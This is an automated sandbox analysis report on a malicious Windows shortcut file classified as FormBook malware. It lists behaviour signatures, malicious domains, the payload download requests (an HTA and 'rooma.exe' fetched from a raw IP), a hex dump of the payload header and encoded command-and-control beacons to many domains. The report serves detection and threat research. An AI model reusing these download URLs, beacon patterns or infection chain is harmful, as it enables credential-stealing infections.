Windows Analysis Report
Offer Document 24.lnk

Overview

General Information

Sample name: Offer Document 24.lnk
Analysis ID: 1446727
MD5: bf9569f5e56e6dcb1f4ae60fd2faea36
SHA1: 1085e4140bf323df085db50b8f79c3b02b4aab72
SHA256: 59f149ffc55554ce0aac7072bba999b5abb83b023486e017f407883f8a27e4e2
Tags: lnk

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected FormBook
AI detected suspicious sample
Found URL in windows shortcut file (LNK)
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: Offer Document 24.lnk Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q== Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/ Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Roaming\rooma.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].hta Avira: detection malicious, Label: VBS/Dldr.Agent.VPLT
Source: C:\Users\user\AppData\Roaming\rooma.exe ReversingLabs: Detection: 65%
Source: Offer Document 24.lnk ReversingLabs: Detection: 28%
Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Roaming\rooma.exe Joe Sandbox ML: detected
Source: Offer Document 24.lnk Joe Sandbox ML: detected
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509569142.000000000093E000.00000002.00000001.01000000.0000000F.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3835791567.000000000093E000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: wntdll.pdbUGP source: rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: rooma.exe, rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256BAB0 FindFirstFileW,FindNextFileW,FindClose, 10_2_0256BAB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then xor eax, eax 10_2_02559480
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then pop edi 10_2_0255DD45
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then pop edi 14_2_023A7ACF
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then pop edi 14_2_023A79C8
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then pop edi 14_2_023B7693
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then xor eax, eax 14_2_023ABF3A

Networking

Source: Traffic Snort IDS: 2024449 ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl 192.168.2.8:49705 -> 20.86.128.223:80
Source: DNS query: www.joyesi.xyz
Source: unknown Network traffic detected: IP country count 12
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 May 2024 18:20:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 23 May 2024 10:27:58 GMTETag: "42200-6191c8140a322"Accept-Ranges: bytesContent-Length: 270848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 c1 68 85 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 10 04 00 00 00 00 00 00 00 00 00 d0 15 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 0f 04 00 00 10 00 00 00 10 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /room/rooma.exe HTTP/1.1Host: 20.86.128.223Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View IP Address: 185.237.107.49 185.237.107.49
Source: Joe Sandbox View IP Address: 116.50.37.244 116.50.37.244
Source: Joe Sandbox View ASN Name: UA-WEECOMI-ASUA UA-WEECOMI-ASUA
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: global traffic HTTP traffic detected: GET /room/room4.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 20.86.128.223Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /room/rooma.exe HTTP/1.1Host: 20.86.128.223Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.joyesi.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic DNS traffic detected: DNS query: www.techchains.info
Source: global traffic DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic DNS traffic detected: DNS query: www.660danm.top
Source: global traffic DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic DNS traffic detected: DNS query: www.shenzhoucui.com
